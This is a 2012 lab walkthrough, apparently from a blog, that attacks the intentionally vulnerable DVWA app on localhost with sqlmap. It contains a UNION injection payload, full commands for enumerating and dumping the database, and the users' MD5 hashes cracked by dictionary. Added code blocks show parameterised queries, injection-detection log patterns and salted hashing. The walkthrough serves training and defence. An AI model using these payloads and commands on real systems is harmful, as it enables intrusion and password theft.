Wednesday, February 1, 2012

DVWA : SQL Injection

DVWA (Damn Vulnerable Web Application) is a deliberately vulnerable web application with many security issues built in.
Let's try to inject it with sqlmap.

1. Start your mysql and apache2 services.
# service apache2 start
# service mysql start

2. Open your browser and type the URL of your DVWA install.
localhost/dvwa

3. We need to set up the database first, so click the link.

4. Once that's done, you're ready to go. Log in with user: admin, password: password.

5. Set the DVWA Security to Low.

6. Click the SQL Injection section.
7. Then try entering a single quote (') in the form. An error page will appear.

8. Let's try some more input.
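Why the single quote in step 7 produces an error page, and why the same input is harmless against a parameterised query, as an added example (not part of the original post). It assumes a DVWA-like lookup of the form `SELECT first_name, last_name FROM users WHERE user_id = '<id>'` and uses an in-memory sqlite3 table constructed here; the two MD5 values are the ones shown later in this post's sqlmap output.

```python
import sqlite3

# Constructed stand-in for DVWA's users table (not a real DVWA dump).
ROWS = [
    (1, "admin", "admin", "admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
    (2, "Gordon", "Brown", "gordonb", "e99a18c428cb38d5f260853678922e03"),
]

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, "
                 "last_name TEXT, user TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?,?,?,?,?)", ROWS)
    return conn

def lookup_vulnerable(conn, user_id):
    # DVWA "low" style: the id parameter is pasted into the SQL text, so a
    # quote or SQL keyword inside it becomes part of the statement.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '%s'" % user_id
    return conn.execute(sql).fetchall()

def lookup_safe(conn, user_id):
    # Parameterised: the value travels separately from the SQL text and is
    # only ever compared as data against user_id.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()

def probe(conn, user_id, fn):
    """Return ('error', message) or ('rows', rows): the error page DVWA shows
    in step 7 versus a normal result."""
    try:
        return ("rows", fn(conn, user_id))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))

# sqlite3 comments with '--' where the MySQL payload in this post uses '#'.
UNION_PAYLOAD = "' UNION ALL SELECT user, password FROM users-- "

if __name__ == "__main__":
    db = make_db()
    for inp in ["1", "'", UNION_PAYLOAD]:
        print(repr(inp), "vulnerable:", probe(db, inp, lookup_vulnerable))
        print(repr(inp), "safe:      ", probe(db, inp, lookup_safe))
```

The concatenated version leaks the password column to the UNION input; the parameterised version returns no rows for it and no error for the lone quote.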

9. Great, now let's attack it with sqlmap.
# cd /pentest/database/sqlmap

10. Before executing the command, let's capture the request with Burp Suite. (I'll explain more about Burp Suite later.)
After capturing the request I got the following results. I'll use the captured URL and cookie in the sqlmap command.

11. Execute the command:
# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=%1&Submit=Submit" --cookie "security=low; PHPSESSID=j0cerp7v72o453prnun2s6tam2" --dbs
You get the following results:
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 18:47:15

[18:47:15] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[18:47:15] [INFO] resuming injection data from session file
[18:47:15] [INFO] resuming back-end DBMS 'mysql 5' from session file
[18:47:15] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=' UNION ALL SELECT NULL, CONCAT(CHAR(58,114,121,103,58),CHAR(85,120,121,98,86,107,114,83,109,101),CHAR(58,115,122,113,58))# &Submit=Submit
---

[18:47:16] [INFO] manual usage of GET payloads requires url encoding
[18:47:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[18:47:16] [INFO] fetching database names
[18:47:16] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': information_schema, dvwa, mysql
available databases [3]:
[*] dvwa
[*] information_schema
[*] mysql

[18:47:16] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 18:47:16


We get the databases on the server.
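What the request above looks like from the server side, as an added example (not part of the original post): a small scanner for Apache access-log lines that flags the indicators this run leaves behind (a quote in a parameter, UNION ... SELECT, CHAR(...) encoding, a trailing comment, and sqlmap's default User-Agent). The log lines are constructed here to mirror the /dvwa/vulnerabilities/sqli/ request, not real captured traffic; the sqlmap User-Agent string is an assumption of the form that tool uses.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache combined-format lines (not real traffic).
LOG_LINES = [
    '127.0.0.1 - - [01/Feb/2012:18:47:15 +0700] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 1512 "-" "Mozilla/5.0"',
    '127.0.0.1 - - [01/Feb/2012:18:47:15 +0700] "GET /dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit HTTP/1.1" 200 634 "-" "Mozilla/5.0"',
    '127.0.0.1 - - [01/Feb/2012:18:47:16 +0700] "GET /dvwa/vulnerabilities/sqli/?id=%27%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2858%2C114%29%29%23&Submit=Submit HTTP/1.1" 200 1780 "-" "sqlmap/1.0-dev (http://sqlmap.sourceforge.net)"',
]

# request line, status, bytes, referer, user-agent
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
                    r'\d+ \S+ "[^"]*" "(?P<ua>[^"]*)"')

# Checked against each URL-decoded parameter value.
SQL_PATTERNS = [
    ("union-select", re.compile(r"\bUNION\b.*\bSELECT\b", re.I)),
    ("char-encoding", re.compile(r"\bCHAR\s*\(", re.I)),
    ("comment", re.compile(r"(#|--\s|/\*)")),
]

def inspect_line(line):
    """Return the list of reasons a line is suspicious (empty if none)."""
    m = REQ_RE.search(line)
    if not m:
        return []
    reasons = []
    if "sqlmap" in m.group("ua").lower():
        reasons.append("sqlmap user-agent")
    query = urlsplit(m.group("target")).query
    # parse_qsl decodes %27 -> ' and %23 -> #, so we test the real values
    for name, value in parse_qsl(query, keep_blank_values=True):
        if "'" in value:
            reasons.append("quote in %s" % name)
        for label, pat in SQL_PATTERNS:
            if pat.search(value):
                reasons.append("%s in %s" % (label, name))
    return reasons

def scan(lines):
    """(line number, reasons) for every flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        reasons = inspect_line(line)
        if reasons:
            hits.append((n, reasons))
    return hits

if __name__ == "__main__":
    for n, reasons in scan(LOG_LINES):
        print(n, ", ".join(reasons))
```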

12. Okay, now let's see the tables in the "dvwa" database. Execute this command:
# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=%1&Submit=Submit" --cookie "security=low; PHPSESSID=j0cerp7v72o453prnun2s6tam2" -D dvwa --tables
The results:
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 18:53:45

[18:53:45] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[18:53:45] [INFO] resuming injection data from session file
[18:53:45] [INFO] resuming back-end DBMS 'mysql 5' from session file
[18:53:45] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=' UNION ALL SELECT NULL, CONCAT(CHAR(58,114,121,103,58),CHAR(85,120,121,98,86,107,114,83,109,101),CHAR(58,115,122,113,58))# &Submit=Submit
---

[18:53:45] [INFO] manual usage of GET payloads requires url encoding
[18:53:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[18:53:45] [INFO] fetching tables for database: dvwa
[18:53:45] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': dvwa, guestbook, dvwa, users
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

[18:53:45] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 18:53:45


Found two tables, guestbook and users.

13. Because we want to see the users, let's execute the next command:
# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=%1&Submit=Submit" --cookie "security=low; PHPSESSID=j0cerp7v72o453prnun2s6tam2" -D dvwa -T users --column
Results:
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 19:17:00

[19:17:00] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[19:17:00] [INFO] resuming injection data from session file
[19:17:00] [INFO] resuming back-end DBMS 'mysql 5' from session file
[19:17:00] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=' UNION ALL SELECT NULL, CONCAT(CHAR(58,114,121,103,58),CHAR(85,120,121,98,86,107,114,83,109,101),CHAR(58,115,122,113,58))# &Submit=Submit
---

[19:17:00] [INFO] manual usage of GET payloads requires url encoding
[19:17:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[19:17:00] [INFO] fetching columns for table 'users' on database 'dvwa'
[19:17:00] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': user_id, int(6), first_name, varchar(15), last_name, varchar(15), user, varchar(15), password, varchar(32), avatar, varchar(70)
Database: dvwa
Table: users
[6 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| avatar     | varchar(70) |
| first_name | varchar(15) |
| last_name  | varchar(15) |
| password   | varchar(32) |
| user       | varchar(15) |
| user_id    | int(6)      |
+------------+-------------+

[19:17:00] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 19:17:00


Found all the columns.

14. Next, let's see what's inside the password column.
# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=%1&Submit=Submit" --cookie "security=low; PHPSESSID=j0cerp7v72o453prnun2s6tam2" -D dvwa -T users -C password --dump
And the results:
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 19:18:16

[19:18:16] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[19:18:16] [INFO] resuming injection data from session file
[19:18:16] [INFO] resuming back-end DBMS 'mysql 5' from session file
[19:18:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=' UNION ALL SELECT NULL, CONCAT(CHAR(58,114,121,103,58),CHAR(85,120,121,98,86,107,114,83,109,101),CHAR(58,115,122,113,58))# &Submit=Submit
---

[19:18:16] [INFO] manual usage of GET payloads requires url encoding
[19:18:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
do you want to use LIKE operator to retrieve column names similar to the ones provided with the -C option? [Y/n] y
[19:18:22] [INFO] fetching columns LIKE 'password' for table 'users' on database 'dvwa'
[19:18:22] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': password, varchar(32)
[19:18:22] [INFO] fetching column(s) 'password' entries for table 'users' on database 'dvwa'
[19:18:22] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': 5f4dcc3b5aa765d61d8327deb882cf99, e99a18c428cb38d5f260853678922e03, 8d3533d75ae2c3966d7e0d4fcc69216b, 0d107d09f5bbe40cade3de5c71e9e9b7, 5f4dcc3b5aa765d61d8327deb882cf99
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
[19:18:25] [INFO] using hash method: 'md5_generic_passwd'
what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
[19:18:28] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] y
[19:18:31] [INFO] starting dictionary attack (md5_generic_passwd)
[19:18:31] [INFO] found: 'abc123' for hash: 'e99a18c428cb38d5f260853678922e03'
[19:18:31] [INFO] found: 'charley' for hash: '8d3533d75ae2c3966d7e0d4fcc69216b'
[19:18:32] [INFO] found: 'letmein' for hash: '0d107d09f5bbe40cade3de5c71e9e9b7'
[19:18:32] [INFO] found: 'password' for hash: '5f4dcc3b5aa765d61d8327deb882cf99'
Database: dvwa
Table: users
[4 entries]
+---------------------------------------------+
| password                                    |
+---------------------------------------------+
| 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  |
| 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  |
| e99a18c428cb38d5f260853678922e03 (abc123)   |
| 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+---------------------------------------------+

[19:18:32] [INFO] Table 'dvwa.users' dumped to CSV file '/pentest/database/sqlmap/output/localhost/dump/dvwa/users.csv'
[19:18:32] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 19:18:32


The passwords are stored as MD5 hashes rather than plaintext; fortunately sqlmap can run a dictionary attack on them and recover the original passwords.  :)
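Why the dictionary attack above succeeds so quickly, and what storage would have resisted it, as an added example (not part of the original post). It checks the four MD5 values from this post's sqlmap output against a tiny constructed wordlist, then shows the same passwords stored with a per-user random salt and PBKDF2 from Python's standard library; the iteration count is an assumption, not a DVWA or sqlmap setting.

```python
import hashlib
import hmac
import os

# The four MD5 values sqlmap dumped from dvwa.users in this post.
POST_HASHES = [
    "5f4dcc3b5aa765d61d8327deb882cf99", "e99a18c428cb38d5f260853678922e03",
    "8d3533d75ae2c3966d7e0d4fcc69216b", "0d107d09f5bbe40cade3de5c71e9e9b7",
]
# Constructed tiny wordlist standing in for sqlmap's txt/wordlist.txt.
WORDLIST = ["123456", "password", "abc123", "letmein", "charley", "qwerty"]

def audit_unsalted_md5(stored_hashes, wordlist):
    """Map each stored hash to the dictionary word that produces it, if any.
    Unsalted MD5 is deterministic, so one precomputed table answers for
    every user at once: this is what sqlmap's md5_generic_passwd step does."""
    table = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return {h: table[h] for h in stored_hashes if h in table}

# Hardened storage: random 16-byte salt per user plus a slow, iterated hash.
ITERATIONS = 200_000  # assumed value; tune to your hardware

def hash_password(password, salt=None):
    """Return 'salthex$dkhex'; a fresh salt means equal passwords differ."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt.hex() + "$" + dk.hex()

def verify_password(password, stored):
    salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), ITERATIONS)
    # constant-time compare so verification timing leaks nothing
    return hmac.compare_digest(dk.hex(), dk_hex)

if __name__ == "__main__":
    print(audit_unsalted_md5(POST_HASHES, WORDLIST))
    stored = hash_password("password")
    print(stored, verify_password("password", stored))
```

With salted PBKDF2 the precomputed-table trick no longer applies: each user's hash must be attacked separately and every guess costs ITERATIONS rounds.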

"the quieter you become, the more you are able to hear.."
